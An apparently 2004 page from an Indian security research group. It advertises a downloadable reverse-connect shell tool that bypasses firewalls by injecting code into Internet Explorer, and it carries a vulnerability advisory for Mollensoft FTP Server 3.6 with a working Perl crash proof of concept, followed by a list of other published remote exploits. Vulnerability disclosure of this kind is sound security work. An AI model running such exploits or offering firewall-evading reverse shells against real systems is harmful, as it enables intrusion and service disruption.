Recub Version 1.0

RECUB Features.
1 RC4 Encripted Reverce connect Shell for XP,2k,2003.
2 Bypass Firewalls by starting new instance of Internet explorer and injecting code
 

And Many More
 

Download (Win32 Version)
 

For Unix Version : Click Here

 

Mollensoft ftp Server ver 3.6 Buffer overflow ]

-----------------------------------------------------
EOS Advisory - http://www.eos-india.net
-----------------------------------------------------


Vendor : http://www.mollensoft.com
Version : 3.6 (latest)
Vulnerability : Buffer Overflow


About Product
=============

Mollensoft Lightweight FTP Server is a powerful, reliable FTP server for Windows95/98/NT/2000.
It includes New Security and Faster, More Efficient Rules Based Access,
Live Client activity Window as well as a specific Client breakdown window
(below) and significant enhancement in speed/stability and is especially designed
for Intranet Use!

(direct quote from website)

Description
===========

A buffer overflow vulnerability exists in its "CD" command which can lead to READ
any memory location. An attacker can pass a string of 238 bytes to the "CD" command
to cause this overflow.

ftp> CD AAAAAAA...(238 times)

The ftpd deamon at this point crashes with an error message saying

"The instruction at 0x50e0931f referenced memory at 0x41414141. The memory could not
be read."

On debugging the process, the instruction at memory location "0x50E0931F" is found
to be "CMP BYTE PTR DS:[ESI], 1F" And the register ESI contains "41414141". So
basically the application is trying to READ from 0x41414141. Thus in this manner
an attacker can force the application to READ from any memory location. In worst
cases if properly exploited the vulnerability can also lead to a remote exploit
giving complete access to the vulnerable system.

Proof Of Concept
================

# C:\Active Perl\perl
# POC for mollensoft ftp server 3.6
# Will crash the deamon

use IO::Socket::INET;

$host = "localhost";
$port = 21;
$buffer = "A" x 238;

$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);

print $socket "USER root\r\n";
$socket->recv($test,100);
print $test;

print $socket "PASS password\r\n";
$socket->recv($test,100);
print $test;

print $socket "CD $buffer\r\n";
$socket->recv($test,100);
print $test;

close($socket);


Credits
=======

Chintan Trivedi - chesschintan [at] hotmail.com
http://www.eos-india.net
Eye on Security Research Group - India
 

Cross Site Scripting vulnerability in bb_func_usernfo.php
 

XSS Bug in XOOPS 1.0.5.1
Mambo Open Source 4.0.14 Webserver SQL injection.
Ltrace buffer overrun bug.

 

 

 

 

06.05.2004: Pound <=1.5 remote format string exploit (public version)
 

01.05.2004: X-Chat 1.8.0 - 2.0.8 Remote Exploit

 

06.04.2004: Monit <= 4.2 Basic Authentication - Username overflow remote root exploit

 

28.03.2004: Ethereal 0.10.0-0.10.2 IGAP Dissector Message Overflow Remote Root Exploit

 

02.3.2004: PSO-Proxy 0.9 PoC Remote Exploit
   

CopyRight © 2004 - The Eye on Security Research Group - India